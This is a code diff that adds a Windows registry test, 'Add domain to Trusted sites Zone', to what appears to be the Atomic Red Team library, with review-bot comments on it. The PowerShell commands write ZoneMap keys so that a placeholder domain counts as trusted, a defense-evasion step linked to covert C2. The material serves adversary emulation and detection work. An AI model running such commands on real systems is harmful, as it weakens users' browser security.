diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index f7dc1c86..f3e8e496 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -20,6 +20,8 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #5 - Modify registry to store PowerShell code](#atomic-test-5---modify-registry-to-store-powershell-code)
+- [Atomic Test #6 - Add domain to Trusted sites Zone](#atomic-test-6---add-domain-to-trusted-sites-zone)
+
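Review bot: The title on the added TOC line mixes case ("Trusted sites Zone"), and the description added further down in this file calls the same thing the "trusted site zone". Pick one form, for example "Trusted Sites zone", and use it consistently in the heading, the description and the index entries.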
@@ -180,3 +182,30 @@ Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_
```
+
+
+## Atomic Test #6 - Add domain to Trusted sites Zone
+Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here:
+https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+$name ="bad-subdomain"
+new-item $key -Name $name -Force
+new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
+new-itemproperty $key$name -Name http -Value 2 -Type DWORD;
+new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
+```
+
+
+#### Cleanup Commands:
+```
+$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+Remove-item $key -Recurse
+```
+
+
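Review bot: In the run block, the last `new-itemproperty` line passes `-Name *` unquoted, and nothing in the test says what `-Value 2` means. Quote the name (`-Name '*'`) so it reads as a literal value name, and add a sentence to the description stating that 2 is the Trusted sites zone, since a DWORD of 2 written under `ZoneMap\Domains\` is what a detection for this test would key on. The trailing `;` on the three property lines is not needed. In the cleanup block, `Remove-item $key -Recurse` raises an error if the key was never created; adding `-ErrorAction Ignore` makes cleanup safe to run on its own.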
diff --git a/atomics/index.md b/atomics/index.md
index 277be38f..2e9cc3d3 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -316,6 +316,7 @@
- Atomic Test #3: Modify Registry of Another User Profile [windows]
- Atomic Test #4: Modify registry to store logon credentials [windows]
- Atomic Test #5: Modify registry to store PowerShell code [windows]
+ - Atomic Test #6: Add domain to Trusted sites Zone [windows]
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index f2ca259b..89af6041 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -9907,6 +9907,24 @@ defense-evasion:
-Name #{registry_entry_storage}
'
+ - name: Add domain to Trusted sites Zone
+ description: "Attackers may add a domain to the trusted site zone to bypass
+ defenses. Doing this enables attacks such as c2 over office365 as described
+ here:\nhttps://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
+ \n"
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: "$key= \"HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet
+ Settings\\ZoneMap\\Domains\\bad-domain.com\\\"\n$name =\"bad-subdomain\"\nnew-item
+ $key -Name $name -Force\nnew-itemproperty $key$name -Name https -Value 2
+ -Type DWORD; \nnew-itemproperty $key$name -Name http -Value 2 -Type DWORD;
+ \nnew-itemproperty $key$name -Name * -Value 2 -Type DWORD; \n"
+ cleanup_command: |-
+ $key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+ Remove-item $key -Recurse
T1170:
technique:
x_mitre_data_sources:
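Review bot: `bad-domain.com` and `bad-subdomain` are hard-coded in both `command` and `cleanup_command`, whereas the preceding test in this file takes its names from arguments such as `#{registry_entry_storage}`. Declare them under `input_arguments` with these values as defaults and reference them as `#{...}` in both commands, so the two cannot drift apart and anyone running the test can point it at a domain their own detections are tuned for. `elevation_required: false` is consistent with the HKCU path, but the description should say that the change only affects the current user's zone map.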
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index b9d3f405..1a50374e 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -113,6 +113,7 @@
- Atomic Test #3: Modify Registry of Another User Profile [windows]
- Atomic Test #4: Modify registry to store logon credentials [windows]
- Atomic Test #5: Modify registry to store PowerShell code [windows]
+ - Atomic Test #6: Add domain to Trusted sites Zone [windows]
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]